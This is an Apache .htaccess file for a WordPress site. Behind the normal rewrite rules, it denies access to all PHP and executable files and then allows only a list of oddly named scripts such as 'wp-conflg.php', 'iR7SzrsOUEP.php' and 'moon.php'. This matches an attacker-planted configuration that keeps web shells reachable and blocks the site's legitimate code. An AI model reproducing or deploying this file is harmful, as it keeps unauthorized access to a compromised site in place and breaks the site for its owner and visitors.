<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
<FilesMatch ".(py|exe|phtml|php|PhP|php5|suspected)$">
Order Allow,Deny
Deny from all
</FilesMatch>
<FilesMatch "^(index.php|wp-login.php|wp-blog-header.php|style.php|style2.php|wp-conflg.php|index.php|class.api.php|iR7SzrsOUEP.php|license.php|wp-blog.php|moon.php|wp-add.php|plugin-install.php|admin.php|wp-sigunq.php|my1.php|wp-add.php|moon.php|class.core-pattern.php|config-walker-pattern.php|init-core-sitemaps.php|class.load-role.php|vars-option.php|init-rest-option.php|lang-vars-role.php|license.php|wp-blog.php|dist.rest-nva.php|dist-inc-api.php|init.inc-media.php|site-api.php|init.block-settings.php|config-inc-role.php|lang.core-compat.php|config.walker-loader.php|config.core-style.php|config-load-nav.php|config-vars-media.php|config.walker-style.php)$">
Order allow,deny
Allow from all
</FilesMatch>